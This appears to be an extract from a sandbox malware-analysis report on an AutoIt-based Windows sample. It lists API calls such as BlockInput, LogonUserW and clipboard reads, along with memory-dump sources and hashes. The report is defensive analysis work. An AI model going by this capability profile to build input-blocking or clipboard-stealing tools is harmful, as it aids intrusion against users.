                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionRaise
                                                                                                                • String ID:
                                                                                                                • API String ID: 3997070919-0
                                                                                                                • Opcode ID: 3e752bb449efab522d3200141cf3dcee0c6bb4a1b97e107f9c0d62f6c5d4ee43
                                                                                                                • Instruction ID: 72ef4f9e9c7a35c4269090967bf6b9d23df6b64c3bcfe04dbdb27e9d628d6ebd
                                                                                                                • Opcode Fuzzy Hash: 3e752bb449efab522d3200141cf3dcee0c6bb4a1b97e107f9c0d62f6c5d4ee43
                                                                                                                • Instruction Fuzzy Hash: D0B191B1A10609CFDB18DF18C496AA67BE0FF44354F19865EE99A8F3E1C738D981CB44
                                                                                                                APIs
                                                                                                                • BlockInput.USER32(00000001), ref: 0045A272
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BlockInput
                                                                                                                • String ID:
                                                                                                                • API String ID: 3456056419-0
                                                                                                                • Opcode ID: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                • Instruction ID: 5d782454ef4d0180448527013755d2523f66e5fc327f68786c1d80a86620ac83
                                                                                                                • Opcode Fuzzy Hash: f8b7596c9daf0cf449ec099d4cdbafb4be693b9bdeaa48314d03f681346fce8b
                                                                                                                • Instruction Fuzzy Hash: D2E04F752043019BC700EF71C545A5BB7E4AF94314F108C6EF845A7351D775AC45CB66
                                                                                                                APIs
                                                                                                                • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 0043918E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LogonUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 1244722697-0
                                                                                                                • Opcode ID: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                • Instruction ID: 63114e5cfb2c4979e73f5d19eacf740c811f86df1a08bc2cb556a5e36cce81ff
                                                                                                                • Opcode Fuzzy Hash: 365ca9639b26e9c6c56151d88f527b1e4ffaee0f54dfd66c8778d151900be7f4
                                                                                                                • Instruction Fuzzy Hash: 8DD0ECB52686066FD204CB24D846E2B77E9A7C4701F008A0CB196D2280C670D805CA32
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: NameUser
                                                                                                                • String ID:
                                                                                                                • API String ID: 2645101109-0
                                                                                                                • Opcode ID: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                • Instruction ID: 8011c19b6c32d183c263453b2018abc548473ce9ed5616c99acac4896e71f792
                                                                                                                • Opcode Fuzzy Hash: b783c70369e54a54257db95ea8fbffa2a0b511f3d9d58af1a6b6f1143851980f
                                                                                                                • Instruction Fuzzy Hash: F6E08C322083058FC310EF55F8405ABB390EB94311F004C3FE64AA2191DA79920EDFAB
                                                                                                                APIs
                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(Function_00021FEC), ref: 00422033
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ExceptionFilterUnhandled
                                                                                                                • String ID:
                                                                                                                • API String ID: 3192549508-0
                                                                                                                • Opcode ID: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                • Instruction ID: 3275b40964251646410af8875a24301f93fa315c26af6adae0ca3d0f7a721f84
                                                                                                                • Opcode Fuzzy Hash: 299f58dbcf75cd09f1fee721c9404e411c3f17cf80a1a40ae63587de51767455
                                                                                                                • Instruction Fuzzy Hash: CD9002743511144A4A011BB16E5D90925D46A586067920875B411C4064DB9840019619
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Time$FileSystem
                                                                                                                • String ID: rJ
                                                                                                                • API String ID: 2086374402-1865492326
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4331374754.0000000004547000.00000040.00000020.00020000.00000000.sdmp, Offset: 04547000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4547000_p4rsJEIb7k.jbxd
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(?), ref: 004593D7
                                                                                                                • DeleteObject.GDI32(?), ref: 004593F1
                                                                                                                • DestroyWindow.USER32(?), ref: 00459407
                                                                                                                • GetDesktopWindow.USER32 ref: 0045942A
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00459431
                                                                                                                • SetRect.USER32(50000001,00000000,00000000,000001F4,?), ref: 00459568
                                                                                                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00459577
                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,?,?,50000001,?,?,00000000,00000000), ref: 004595BB
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 004595C8
                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00459615
                                                                                                                • CreateFileW.KERNEL32(00000000,?,80000000,00000000,00000000,00000003,00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459635
                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459654
                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 0045965F
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00459668
                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459678
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0045967F
                                                                                                                • CloseHandle.KERNEL32(00000000,?,50000001,?,?,00000000,00000000,00000000), ref: 00459686
                                                                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,50000001,?,?,00000000,00000000,00000000), ref: 00459694
                                                                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,000001F4), ref: 004596AD
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004596C0
                                                                                                                • CopyImage.USER32(000000FF,00000000,00000000,00000000,00002000), ref: 004596EF
                                                                                                                • SendMessageW.USER32(00000000,00000172,00000000,000000FF), ref: 00459712
                                                                                                                • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,50000001,?,?,00000000,00000000,00000000), ref: 0045973D
                                                                                                                • ShowWindow.USER32(?,00000004,?,50000001,?,?,00000000,00000000,00000000), ref: 0045974B
                                                                                                                • CreateWindowExW.USER32(00000000,static,00000000,?,?,0000000B,0000000B,?,?,?,00000000,00000000), ref: 0045979C
                                                                                                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004597AD
                                                                                                                • GetStockObject.GDI32(00000011), ref: 004597B7
                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004597BF
                                                                                                                • GetTextFaceW.GDI32(00000000,00000040,00000190,?,50000001,?,?,00000000,00000000,00000000), ref: 004597CD
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004597D6
                                                                                                                • DeleteDC.GDI32(00000000), ref: 004597E1
                                                                                                                • CreateFontW.GDI32(?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 004598BB
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 004598D0
                                                                                                                • GetDC.USER32(?), ref: 004598DE
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 004598EE
                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00459919
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00459925
                                                                                                                • MoveWindow.USER32(?,0000000B,?,?,?,00000001), ref: 00459943
                                                                                                                • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,00000190), ref: 00459951
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Create$Object$Global$Rect$DeleteFileSelect$MessageSendShow$AdjustAllocCapsClientCloseCopyDesktopDestroyDeviceFaceFontFreeHandleImageLoadLockMovePictureReadReleaseSizeStockStreamTextUnlock
                                                                                                                • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                • API String ID: 1538203242-2373415609
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32(0000000E), ref: 00433D81
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00433D89
                                                                                                                • GetSysColor.USER32(00000012), ref: 00433DA3
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00433DAB
                                                                                                                • GetSysColorBrush.USER32(0000000F), ref: 00433DBF
                                                                                                                • GetSysColor.USER32(0000000F), ref: 00433DCB
                                                                                                                • CreateSolidBrush.GDI32(?), ref: 00433DD4
                                                                                                                • GetSysColor.USER32(00000011), ref: 00433DEB
                                                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00433E0D
                                                                                                                • SetBkColor.GDI32(?,?), ref: 00433E19
                                                                                                                • SelectObject.GDI32(?,?), ref: 00433E29
                                                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
                                                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
                                                                                                                • GetWindowLongW.USER32 ref: 00433E8A
                                                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
                                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
                                                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
                                                                                                                • DrawFocusRect.USER32(?,?), ref: 00433F1F
                                                                                                                • GetSysColor.USER32(00000011), ref: 00433F2E
                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 00433F36
                                                                                                                • DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
                                                                                                                • SelectObject.GDI32(?,?), ref: 00433F63
                                                                                                                • DeleteObject.GDI32(?), ref: 00433F70
                                                                                                                • SelectObject.GDI32(?,?), ref: 00433F78
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00433F7B
                                                                                                                • SetTextColor.GDI32(?,?), ref: 00433F83
                                                                                                                • SetBkColor.GDI32(?,?), ref: 00433F8F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                • String ID:
                                                                                                                • API String ID: 1582027408-0
                                                                                                                APIs
                                                                                                                • OpenClipboard.USER32(?), ref: 0046C635
                                                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
                                                                                                                • GetClipboardData.USER32(0000000D), ref: 0046C64F
                                                                                                                • CloseClipboard.USER32 ref: 0046C65D
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C688
                                                                                                                • CloseClipboard.USER32 ref: 0046C692
                                                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
                                                                                                                • GetClipboardData.USER32(00000001), ref: 0046C6DD
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 0046C6EE
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0046C726
                                                                                                                • CloseClipboard.USER32 ref: 0046C866
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
                                                                                                                • String ID: HH
                                                                                                                • API String ID: 589737431-2761332787
                                                                                                                APIs
                                                                                                                • GetCursorPos.USER32(?), ref: 00456692
                                                                                                                • GetDesktopWindow.USER32 ref: 004566AA
                                                                                                                • GetWindowRect.USER32(00000000), ref: 004566B1
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0045670D
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00456720
                                                                                                                • DestroyWindow.USER32(?), ref: 00456731
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
                                                                                                                • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
                                                                                                                • IsWindowVisible.USER32(?), ref: 00456812
                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
                                                                                                                • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0045685C
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
                                                                                                                • GetMonitorInfoW.USER32 ref: 00456894
                                                                                                                • CopyRect.USER32(?,?), ref: 004568A8
                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                • String ID: ($,$tooltips_class32
                                                                                                                • API String ID: 541082891-3320066284
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 0-4108050209
                                                                                                                APIs
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004701EA
                                                                                                                • GetClientRect.USER32(?,?), ref: 004701FA
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00470202
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 00470216
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 00470238
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0047026B
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 00470273
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004702A0
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 004702A8
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 004702CF
                                                                                                                • SetRect.USER32(?,00000000,00000000,?,?), ref: 004702F1
                                                                                                                • AdjustWindowRectEx.USER32(?,?,00000000,000000FF), ref: 00470304
                                                                                                                • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 0047033E
                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00470356
                                                                                                                • GetClientRect.USER32(?,?), ref: 00470371
                                                                                                                • GetStockObject.GDI32(00000011), ref: 00470391
                                                                                                                • SendMessageW.USER32(?,00000030,00000000), ref: 0047039D
                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,Function_00061E7F), ref: 004703C4
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer
                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                • API String ID: 2872485747-248962490
                                                                                                                APIs
                                                                                                                • SetWindowPos.USER32(004A83D8,00000000,00000000,00000000,00000000,00000000,00000013,004A83D8,?,?), ref: 0044880A
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Window
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 2353593579-4108050209
                                                                                                                APIs
                                                                                                                • GetSysColor.USER32 ref: 0044A11D
                                                                                                                • GetClientRect.USER32(?,?), ref: 0044A18D
                                                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0044A1A6
                                                                                                                • GetWindowDC.USER32(?), ref: 0044A1B3
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A1C6
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A1D6
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A1EC
                                                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 0044A207
                                                                                                                • GetSysColor.USER32(0000000F), ref: 0044A216
                                                                                                                • GetSysColor.USER32(00000005), ref: 0044A21E
                                                                                                                • GetWindowDC.USER32 ref: 0044A277
                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0044A28A
                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0044A29F
                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0044A2B4
                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0044A2D0
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 0044A2D8
                                                                                                                • SetTextColor.GDI32(00000000,?), ref: 0044A2F6
                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 0044A30A
                                                                                                                • GetStockObject.GDI32(00000005), ref: 0044A312
                                                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0044A328
                                                                                                                Similarity
                                                                                                                • API ID: Color$Pixel$Window$Release$ClientLongMessageModeObjectRectSendStockText
                                                                                                                • String ID:
                                                                                                                • API String ID: 1744303182-0
                                                                                                                APIs
                                                                                                                Similarity
                                                                                                                • API ID: InitVariant
                                                                                                                • String ID:
                                                                                                                • API String ID: 1927566239-0
                                                                                                                • Opcode ID: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                • Instruction ID: b17386a2766a1a739d91313a8bf0106a5dd250ff49ec0cac6ee5761d63536315
                                                                                                                • Opcode Fuzzy Hash: 0ce8a0180f427c6633dd7a645a706da8f2470da33a28fd12fcc8bbcffff15558
                                                                                                                • Instruction Fuzzy Hash: 87A1F5766146019FC300EF65D88499FB7AAFF85315F408D3EFA49C3211D77AD4098BAA
                                                                                                                APIs
                                                                                                                • GetForegroundWindow.USER32(?,?), ref: 0046D7C1
                                                                                                                • GetForegroundWindow.USER32 ref: 0046DBA4
                                                                                                                • IsWindow.USER32(?), ref: 0046DBDE
                                                                                                                • GetDesktopWindow.USER32 ref: 0046DCB5
                                                                                                                • EnumChildWindows.USER32(00000000), ref: 0046DCBC
                                                                                                                • EnumWindows.USER32(00460772,?), ref: 0046DCC4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$EnumForegroundWindows$ChildDesktop
                                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                • API String ID: 4293069593-1919597938
                                                                                                                • Opcode ID: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                • Instruction ID: 252cd24da08a8cddfda52e39780f3f39bafd894638fb43d2866a45805a666b3e
                                                                                                                • Opcode Fuzzy Hash: f0ae0bd5c84c8fbd9fa80e8b17a650ade3f6139d63811c55da114ce2128ba9af
                                                                                                                • Instruction Fuzzy Hash: 96F1C571D143409BCB00EF61C881EAB73A4BF95308F44496FF9456B286E77DE909CB6A
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(?,00000063), ref: 004545DA
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004545EC
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00454606
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 0045461F
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00454626
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00454637
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 0045463E
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00454663
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 0045467D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00454688
